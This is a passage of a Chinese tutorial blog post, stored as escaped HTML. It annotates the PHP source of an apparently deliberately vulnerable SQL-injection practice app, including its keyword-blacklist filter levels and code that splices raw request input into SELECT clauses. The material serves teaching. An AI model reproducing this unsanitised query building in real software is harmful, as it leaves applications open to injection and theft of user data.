class=&quot;string&quot;&gt;&#39;&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//对空格的处理，如果参数中没有spaces_remove或者spaces_remove！=on就不会过滤空格&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;spaces_remove&#39;&lt;/span&gt;]) &lt;span class=&quot;keyword&quot;&gt;and&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;spaces_remove&#39;&lt;/span&gt;] == &lt;span class=&quot;string&quot;&gt;&#39;on&#39;&lt;/span&gt;) &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] = str_replace(&lt;span class=&quot;string&quot;&gt;&#39; &#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//黑名单关键字的处理，文章用不上，略过...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;blacklist_keywords&#39;&lt;/span&gt;])) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$blacklist&lt;/span&gt; = explode(&lt;span class=&quot;string&quot;&gt;&#39;,&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;blacklist_keywords&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//过滤级别，新手可以不用管，略过...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;blacklist_level&#39;&lt;/span&gt;])) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;switch&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;blacklist_level&#39;&lt;/span&gt;]) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;comment&quot;&gt;//We process blacklists differently at each level. At the lowest, each keyword is removed case-sensitively.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;comment&quot;&gt;//At medium blacklisting, checks are done case-insensitively.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;comment&quot;&gt;//At the highest level, checks are done case-insensitively and repeatedly.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;low&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;keyword&quot;&gt;foreach&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$blacklist&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                    &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] = str_replace(&lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;medium&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;keyword&quot;&gt;foreach&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$blacklist&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                    &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] = str_replace(strtolower(&lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt;), &lt;span class=&quot;string&quot;&gt;&#39;&#39;&lt;/span&gt;, strtolower(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;]));&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;high&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;keyword&quot;&gt;do&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                    &lt;span class=&quot;variable&quot;&gt;$keyword_found&lt;/span&gt; = &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                    &lt;span class=&quot;keyword&quot;&gt;foreach&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$blacklist&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                        &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] = str_replace(strtolower(&lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt;), &lt;span class=&quot;string&quot;&gt;&#39;&#39;&lt;/span&gt;, strtolower(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;]), &lt;span class=&quot;variable&quot;&gt;$count&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                        &lt;span class=&quot;variable&quot;&gt;$keyword_found&lt;/span&gt; += &lt;span class=&quot;variable&quot;&gt;$count&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &amp;#125; &lt;span class=&quot;keyword&quot;&gt;while&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$keyword_found&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;3.我们再返回到select.php，发现后面也有个submit后表单处理程序，判断要注射的位置并构造sql语句，跟进看下：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;submit&#39;&lt;/span&gt;]))&amp;#123; &lt;span class=&quot;comment&quot;&gt;//submit后，进入处理程序之二，1在上面&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;location&#39;&lt;/span&gt;] == &lt;span class=&quot;string&quot;&gt;&#39;entire_query&#39;&lt;/span&gt;)&amp;#123;&lt;span class=&quot;comment&quot;&gt;//判断是不是整条语句都要注入，这里方便学习可以忽略不管&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$query&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;show_query&#39;&lt;/span&gt;]) &lt;span class=&quot;keyword&quot;&gt;and&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;show_query&#39;&lt;/span&gt;]==&lt;span class=&quot;string&quot;&gt;&#39;on&#39;&lt;/span&gt;) &lt;span class=&quot;variable&quot;&gt;$displayquery&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;/u&amp;gt;&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125; &lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &amp;#123; &lt;span class=&quot;comment&quot;&gt;//这里是根据你选择要注射的位置来构造sql语句&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$display_column_name&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$column_name&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;username&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$display_table_name&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$table_name&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;users&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$display_where_clause&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$where_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;WHERE isadmin = 0&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$display_group_by_clause&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$group_by_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;GROUP BY username&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$display_order_by_clause&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$order_by_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;ORDER BY username ASC&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$display_having_clause&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$having_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;HAVING 1 = 1&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;switch&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;location&#39;&lt;/span&gt;])&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;column_name&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$column_name&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$display_column_name&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;/u&amp;gt;&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;table_name&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$table_name&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$display_table_name&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;/u&amp;gt;&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;where_string&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$where_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;WHERE username = &#39;&quot;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&quot;&#39;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$display_where_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;WHERE username = &#39;&quot;&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;/u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&quot;&#39;&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;where_int&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$where_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;WHERE isadmin = &#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$display_where_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;WHERE isadmin = &#39;&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;/u&amp;gt;&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;group_by&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$group_by_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;GROUP BY &#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$display_group_by_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;GROUP BY &#39;&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;/u&amp;gt;&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;order_by&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$order_by_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;ORDER BY &#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39; ASC&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$display_order_by_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;ORDER BY &#39;&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;/u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39; ASC&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;having&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$having_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;HAVING isadmin = &#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$display_having_clause&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&#39;HAVING isadmin = &#39;&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;u&amp;gt;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39;&amp;lt;/u&amp;gt;&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$query&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;SELECT $column_name FROM $table_name $where_clause $group_by_clause $order_by_clause &quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;comment&quot;&gt;/*Probably a better way to create $displayquery...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	This allows me to underline the injection string&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	in the resulting query that&#39;s displayed with the&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&quot;Show Query&quot; option without munging the query&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	which hits the database.*/&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$displayquery&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;SELECT $display_column_name FROM $display_table_name $display_where_clause $display_group_by_clause $display_order_by_clause &quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;include&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;includes/database.inc.php&#39;&lt;/span&gt;);&lt;span class=&quot;comment&quot;&gt;//这里又引入了一个包，我们继续跟进看看&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
